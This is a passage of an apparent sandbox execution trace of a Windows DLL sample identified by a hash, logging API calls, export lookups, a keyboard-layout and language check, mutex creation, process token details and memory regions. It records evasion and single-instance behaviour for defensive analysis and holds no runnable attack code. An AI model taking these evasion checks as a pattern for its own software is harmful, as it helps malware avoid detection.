lpString2="CommitTransaction") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0133.573] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0133.573] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0133.573] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0133.573] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0133.573] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0133.574] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0133.574] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0133.575] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0133.575] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0133.575] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.576] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0133.577] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0133.577] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0133.578] GetProcessHeap () returned 0x460000 [0133.578] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x460000) returned 1 [0133.751] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0133.752] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0133.752] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1000) returned 0x2cb5030 [0133.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x16) returned 0x4791f0 [0133.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="StopServer", cchWideChar=-1, lpMultiByteStr=0x4791f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StopServer", lpUsedDefaultChar=0x0) returned 11 [0133.755] GetLastError () returned 0x0 [0133.755] SetLastError (dwErrCode=0x0) [0133.755] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StopServerW") returned 0x0 [0133.755] GetLastError () returned 0x7f [0133.755] SetLastError (dwErrCode=0x7f) [0133.755] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StopServerA") returned 0x0 [0133.755] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StopServer") returned 0x7ffc45e914c0 [0133.755] GetActiveWindow () returned 0x0 [0133.759] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0133.759] GetSystemDefaultLangID () returned 0x409 [0133.759] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0133.759] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0133.759] GetProcessHeap () returned 0x460000 [0133.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x463ca0 [0133.760] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0133.760] GetKeyboardLayoutList (in: nBuff=1, lpList=0x463ca0 | out: lpList=0x463ca0) returned 1 [0133.760] GetProcessHeap () returned 0x460000 [0133.760] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x463ca0 | out: hHeap=0x460000) returned 1 [0133.760] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0133.760] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0133.760] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0133.760] GetLastError () returned 0x0 [0133.760] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0133.760] CloseHandle (hObject=0x17c) returned 1 [0133.760] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0133.761] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0133.761] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0133.761] GetLastError () returned 0xb7 [0133.761] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0133.761] CloseHandle (hObject=0x17c) returned 1 [0133.761] ExitProcess (uExitCode=0x1) [0133.762] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46c2f0 | out: hHeap=0x460000) returned 1 [0133.762] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475ae0 | out: hHeap=0x460000) returned 1 [0133.763] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0133.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0133.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0133.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0133.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0133.763] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0133.764] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4770c0 | out: hHeap=0x460000) returned 1 [0133.764] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0133.764] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0133.764] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 32 os_tid = 0xb0 Process: id = "10" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x1f4df000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1245 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1246 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1247 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1248 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1249 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1250 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1251 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1252 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1253 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1254 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 1255 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1258 start_va = 0x400000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1259 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1260 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1261 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1262 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 1263 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1264 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1265 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1266 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1267 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1268 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1270 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1271 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1272 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1273 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1274 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1275 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1276 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1277 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1278 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1279 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1280 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1281 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1282 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1283 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1284 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1285 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1286 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 1287 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1288 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = 